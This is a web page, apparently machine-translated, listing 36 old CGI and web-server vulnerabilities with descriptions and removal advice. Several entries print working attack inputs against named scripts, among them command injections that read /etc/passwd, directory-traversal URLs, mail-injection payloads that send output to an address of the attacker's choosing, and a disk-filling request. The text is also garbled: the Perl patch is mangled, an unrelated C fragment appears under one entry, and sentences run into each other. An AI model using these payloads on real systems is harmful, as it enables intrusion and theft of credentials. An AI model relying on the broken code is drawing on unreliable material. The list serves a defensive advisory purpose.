From: http://www.skyfly.org/
1.WGUSET.EXE Description: If you use NT as your webserver operating system, and "wguest.exe" exists in your web executable directory, intruders will be able to use it to read all your hard drives. USR_ user can read the file. Recommendation: WGUSET.EXE removes or deletes from your web directory. Workaround: remove WGUSET.EXE from your web directory or delete. 2.Rguset.exe Description: If you use NT as your webserver operating system, and RGuest.exe exists in your web executable directory, intruders will be able to read all USRs on your hard drive. _ User can read files. Recommendation: Remove RGUSET.EXE from your web directory or delete. Workaround: remove RGUSET.EXE from your web directory or delete. 3. Perl.exe Description: Perl.exe exists in the CGI-BIN execution directory, which belongs to a serious configuration error. Hackers can add a string of instructions after Perl.exe and use the browser to perform any script programs on the Server. Recommendation: Perl.exe is unsafe in a web directory that is put on any permission. Workaround: Remove the Perl.exe program under the web directory. 4.Shtml.exe Description: If you use Front Page as your webserver, the intruder can use IUSR_ users and Shtml.exe to invade your machine and do things that you don't want. Recommendation: SHTML.EXE removes or deletes from your web directory. Workaround: remove Shtml.exe from your web directory or delete. 5. wwwboard.pl Description: wwwboard.pl program is easy to cause an attacker to attack the server D. O.s. Recommendation: If it is necessary, you can delete the file.
Workaround: Below the subroutine of Get_Variables: if ($ form {'Followup'}) {$ FOLLOWUP = "1"; @followup_num = split (/, /, $ form {'folowup'); $ num_followups = @followups = @followup_num; $ last_message = pop (@followups); $ origdate = "$ FORM { 'origdate'}"; $ origname = "$ FORM { 'origname'}"; $ origsubject = "$ FORM {'Origsubject'};} Replace with: IF ($ form {'Followup'}) {$ FOLLOWUP = "1"; @followup_num = split (/, /, $ form {'Followup'); $ num_followups = @followups = @followup_num; $ last_message = pop (@followups); $ origdate = "$ FORM { 'origdate'}"; $ origname = "$ FORM { 'origname'}"; $ origsubject = "$ FORM { 'origsubject '} "; # Wwwboard bomb patch # Written by: Samuel Sparling sparling@slip.net) $ fn = 0; WHILE ($ FN <$ Num_Followups) {$ cur_fup = @followups $ fn]; $ dfn = 0; foreach $ FM (@followups) {if (@followups [$ dfn] == @followups [$ fn] && $ dfn! = $ fn) {& error (Board_bomb);} $ DFN ;} $ fn ;} # end wwwboard Bomb Patch } 6. UPLoader.exe Description: If you use NT as your webserver operating system, intruders can use UPLoader.exe to upload any file recommendations: remove UPLoader.exe from your web directory from your web directory or delete. Workaround: Remove UPLoader.exe from your web directory or delete. 7. BDIR.htr Description: If you use NT as your WebServer's operating system, and BDIR.htr exists in your web executable directory, intruders will use it in your server's endless creation ODBC database and generate some executable files. Recommendation: Remove BDIR.htr from your web directory or delete. Workaround: remove BDIR.htr from your web directory or delete. 8. Count.cgi Type: Attack Description: The count.cgi program under / cgi-bin directory (wwwcount2.3 version) has an overflow error, allowing intruders to perform any instructions remotely without having to log in. Recommendation: If it is necessary, you can delete the file. Workaround: Upgrade WWWCOUNT to 2.4 or more.
9. Test-CGI Description: TEST-CGI This file can be used by intruders to browse important information on the server. Recommendation: It is recommended to review the execution program in the CGI-bin directory and strictly control access. Workaround: Delete Test-CGI files. 10.NPH-TEST-CGI Description: NPH-TEST-CGI This file can be used by intruders to browse heavy information on the server. Recommendation: It is recommended to review the execution program in the CGI-bin directory and strictly control access. Workaround: Delete the NPH-TEST-CGI file. 11. PHP.CGI Description: PHP.CGI program has more vulnerabilities, including cache overflow vulnerabilities, and the vulnerability suggestions that can be read by any system files can be read by invaders: It is recommended to review the CGI-bin directory to avoid unnecessary The program exists. Workaround: Deleting a PHP.cgi program is the best way. 12.Handler Description: IRIX 5.3, 6.2, 6.3, 6.4 / cgi-bin / handler program There is a cache overflow error, allowing intruders to remotely execute a program on Server: telnet target.machine.com 80 Get / CGI-BIN / Handler / Whatver; CAT / etc / passwd |? Data = Download HTTP / 1.0 Recommendation: It is recommended to review the CGI-BIN directory to avoid unnecessary programs. Workaround: Delete the Handler file. 13. WebGais Description: / cgi-bin, WebGais under the directory is an interface of the GAIS search tool. It has a problem that enables intruders to bypass the security mechanism of the program. 1.0 Content-Length: 85 (Replace this with the actual length of the "Exploit" line) telnet target.machine.com 80 query = '; mail you/@your.host&domain=paragraph suggestion: Recommendation CGI-bin directory, Avoid unnecessary programs exist. Workaround: Delete the WebGais file. 14.Websendmail Description: / cgin-bin directory Websendmail program allows invaders to execute a system directive: telnet target.machine.com 80 Post / CGI-BIN / Websendmail HTTP / 1.0 Content-Length: XXX (SHOULD BE Replaced with THE ACTUAL Length, in this case =; mail your_address/@somewhere.orger=a&rtnaddr=a&subject=a & content = A suggestion: It is recommended to review the cgi-bin directory to avoid no The necessary programs exist. Workaround: Advanced users: Edit Websendmail scripts, filter special characters. General User: Delete the Websendmail file.
15.WebDist.cgi Description: For IRIX6.2 and 6.3 platforms, WebDist.cgi under / cgi-bin directory has a weak point to allow intruders to perform any instructions on the system without logging in: http: // host / cgi-bin /webdist.cgi?distloc=;cat /etc/passwd suggestion: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete WebDist.cgi under the /var/www/cgi-bin/webdist.cgi directory. 16. FAXSURVEY Description: The FaxSurvey program under the Linux Suse / cgi-bin directory allows the invasant to execute instructions in the server without logging in: http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey at BIN / CAT% 20 / ETC / PassWD Recommendation: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete the / cgi-bin / faxsurvey file. 17. HTMLScript Description: Install HTMLScript2.99x or earlier versions of the server, there is a hairy illusor to view any files on the server: http://www.vulnerable.server.com/cgi- bin / htmlscript? . ../../..../etc/passwd suggestion: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete the / cgi-bin / htmlscript script file, or upgrade HTMLScript to 3.0 or more. 18. WWW-SQL Description: WWW-SQL is stored in / cgi-bin / directory, which will cause intrusion to ask the protected file. Recommendation: It is best to delete the WWW-SQL file. Workaround: #if phpfastcgi while (fcgi_accept ()> = 0) {#ENDIF S = GetENV ("redirect_status"); if (! S) {PUTS ("Content-Type: Text / Plain / R / N / R / NPHP / FI Detected An Internal Error. Please Inform Sa@hogia.net of What You Just Did./N "); EXIT (1);} S = GetENV (" Path_Translated "); 19. Name: View-source Description: The View-Source program under the CGI-BIN directory does not check the input, so that the intruder can view any files on the server: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete the ViewSource program under / cgi-bin directory. 20. CAMPAS Description: The CAMPAS program under the cgi-bin directory has a problem that enables intruders to view the important files on the Server: Telnet www.xxxx.net 80 TRYING 200.xx.xx.xx ... connection to venus .xxxx.net escape character is '^]'. get / cgi-bin / campas?% 0act% 0A / ETC / PasswD% 0A suggestion: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete the CAMPAS program under the / cgi-bin directory.
21.Aglimpse Description: Aglimpse program under the CGI-BIN directory has a problem that enables intruders to perform any instructions without having to log in and will be able to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete the AGLIMPSE program under / cgi-bin directory. 22.at-admin.cgi Description: In the /ci-bin/at-admin.cgi program on Excite for Web Servers 1.1, ordinary users are allowed to fully control the entire system: It is recommended to review the cgi-bin directory to avoid unnecessary Program exists. Workaround: Delete the at-admin.cgi program under the / cgi-bin directory. 23. Finger Description: This finger program under / cgi-bin can view information about other servers, but if the parameter is changed to this machine, the account information on this machine will expose non-legacy: / cgi-bin / finger? @ LocalHost recommends: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete the Finger program under / cgi-bin directory. 24. WebWho.pl Description: If there is WebWho.pl in your web executable directory, the intruder will be able to read any files that the user can read and write to the user. Recommendation: Remove WebWho.pl from your web directory. Workaround: Remove WebWho.pl from your web directory. 25. W3-MSQL Description: One CGI (W3-MSQL) included with the MINISQL package release can be used to perform any code with HTTPD UID permissions. This security vulnerability is caused by the scanf () function in the program. Recommendation: If you have installed the Minisql package, please delete or remove the W3-MSQL file under the / cgi-bin / directory: If you have installed the MinisQL package, please / cgi-bin / directory W3-MSQL file delete or remove. 26. Netscape FastTrack Server 2.0.1a Description: Netscape FastTrack Server 2.0.1a included with Unixware 7.1 is stored in a remote buffer overflow vulnerability. By default, the HTTPD of the 457 port provides UNIXWARE documentation through the HTTP protocol. If a length of a length of more than 367 characters is transmitted to the server, the buffer overflows, and the EIP value is overwritten will result in any code to be executed at HTTPD permissions. Recommendation: The temporary solution is to close the Netscape FastTrack server. Workaround: Temporary solution is to close the Netscape FastTrack server. 27. Anyform.cgi Description: The Anyform.cgi program under the CGI-bin directory is used for simple form single pass, but the program is not thorough, which can be used by the invaders, in Server Any instructions are executed. Recommendation: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: It is recommended to upgrade the CGI program or delete the file. 28. WHOIS.CGI Description: There is a spilled vulnerability in whois.cgi in multiple Web Server. They include: Whois INTERNIC LOOKUP - VERSION: 1.02 CC Whois - Version: 1.0 Matt's Whois - Version: 1 They will enable intruders to execute the code recommended by using the license of HTTPD users on your system: Will be in you WEB directory asking whois.cgi delete or removal.
Workaround: Will be asked in your web directory to delete or remove. 29. Environ.cgi Description: Other Web Server or IIS, other Web Server / CGI- BIN / ENVIRON.CGI program, there is a problem that the invader allows the security mechanism to browse some files on the server. Recommendation: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: It is recommended to upgrade the CGI program or delete the file. 30. WRAP Description: / CGI-BIN / WRAP program has two vulnerabilities, all allows invaders to obtain illegal access to files on the server, such as http: // Host / CGI-BIN / WRAP? /../../../ ../../.. --... Recommendation: It is recommended to review the CGI-bin directory to avoid unnecessary programs. Workaround: Delete / CGI-BIN / WRAP file. 31. Edit.pl Description: /cgi-bin/edit.pl has a security weaknever, with the following command, you can visit the user's configuration: http://www.siteTracker.com/cgi-bin/edit. PL? Account = & Password = suggestion: It is recommended to review the CGI-BIN directory to avoid unnecessary programs. Workaround: Delete /ci-bin/edit.pl file. 32.Service.PWD Description: The UNIX system http://www.hostname.com/_vti_pvt/service.pwd readable, will expose user password information. Recommendation: Recommended to delete the solution: chown root service.pwd chmod 700 service.pwd 33.administrators.pwd Description: UNIX system http://www.hostname.com/_vti_pvt/administrators.pwd readable, exposed user password Information Suggestions: Recommended Delete Solution: Chown Root Administrators.pwd Chmod 700 Administrators.pwd 34.Users.pwd Description: UNIX System http://www.hostname.com/_vti_pvt/Users.pwd Readable, will expose user password information Suggestion: Recommended to delete the solution: chown root users.pwd chmod 700 users.pwd 35. Authors.PWD Description: UNIX system http://www.hostname.com/_vti_pvt/authors.pwd readable, exposed user password information Suggestion: Recommended Delete Solution: Chown root authors.pwd chmod 700 authors.pwd 36. Visadmin.exe Description: This file Visadmin.exe exists in the cgi-bin directory of OMNIHTPD Web Server, then the attacker uses the following command: http://omni.server/cgi-bin/visadmin.exe? User = Guest A few minutes later, the server's hard drive will be full. Recommendation: It is recommended to delete.
